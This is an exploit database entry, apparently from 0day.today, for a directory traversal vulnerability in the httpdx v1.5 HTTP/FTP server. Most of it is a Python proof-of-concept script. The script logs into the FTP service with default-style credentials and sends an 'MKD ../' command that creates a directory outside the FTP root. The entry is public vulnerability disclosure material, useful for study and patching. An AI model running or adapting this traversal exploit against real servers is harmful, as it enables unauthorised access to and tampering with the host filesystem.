httpdx - ultralight http/ftp server directory Traversal

🗓️ 15 Feb 2010 00:00:00Reported by FB1H2SType

zdt🔗 0day.today👁 23 Views

httpdx - ultralight http/ftp server directory Traversal, vulnerability in v1.5, tested on WIN XP

=======================================================
httpdx - ultralight http/ftp server directory Traversal
=======================================================

# Exploit Title: httpdx - ultralight http/ftp server directory Traversal
# Date: 14/2/2010
# Author: FB1H2S
# Software Link: http://sourceforge.net/projects/httpdx/
# Version: v1.5
# Tested on: WIN XP2
# CVE : [if exists]
# Code : Attached
 
#!/usr/bin/python
import socket
import sys
hostname='localhost'
username='admin'
passwd='password'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.connect((hostname, 21))
except:
    print ("Connection error!")
    sys.exit(1)
r=sock.recv(1024)
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
# The FTP root is example.com we could move down the root directory
sock.send("MKD ../fb1h2s\r\n")
sock.close()
sys.exit(0);



#  0day.today [2018-01-01]  #

15 Feb 2010 00:00Current

7.1High risk

Vulners AI Score7.1